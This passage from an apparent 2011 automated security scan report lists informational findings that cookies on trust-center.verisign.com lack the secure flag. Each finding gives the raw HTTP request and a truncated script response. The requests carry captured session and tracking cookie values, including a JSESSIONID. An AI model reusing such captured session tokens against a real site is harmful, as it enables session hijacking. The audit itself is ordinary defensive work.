Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*

...[SNIP]...

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
